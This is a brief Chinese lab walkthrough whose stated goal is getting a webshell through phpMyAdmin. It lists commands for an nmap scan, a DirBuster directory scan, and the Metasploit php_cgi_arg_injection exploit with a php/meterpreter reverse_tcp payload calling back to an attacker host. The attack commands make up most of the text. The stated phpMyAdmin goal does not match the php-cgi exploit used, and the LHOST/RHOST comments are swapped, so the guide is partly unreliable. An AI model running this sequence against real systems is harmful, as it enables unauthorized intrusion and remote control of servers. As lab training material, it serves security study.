目的
利用phpMyAdmin漏洞上传mua程序,获得webshell.
环境
步骤
- nmap扫端口(查看80端口是否开了):
nmap -sV 192.168.1.3
- 浏览器地址栏输入:
http:\192.168.1.3
访问目标网站. - 命令
dirbuster
打开OWASP DirBuster软件对目标网站扫描. - 在Target URL处输入
http://192.168.1.3
,在File with list of dirs./file
出选择字典文件.单击start开始扫描. -
扫描结果显示包含cgi-bin目录\phpmyadmin目录等.
- 利用metasploit攻击目标主机:
6.1 打开msfconsole之后,输入search php-cgi
,搜索php_cgi的相关工具和攻击载荷.
6.2 输入use exploit/multi/http/php_cgi_arg_injection
,启动漏洞利用模块,提示符就会提示进入到该路径下.
6.3show payloads --> set PAYLOAD php/meterpreter/reverse_tcp --> show options(显示攻击模块需要设置的参数) --> set LHOST 192.168.1.2(目标主机ip,用于会话反向链接) --> set RHOST 192.168.1.3(源主机ip) --> exploit --> ls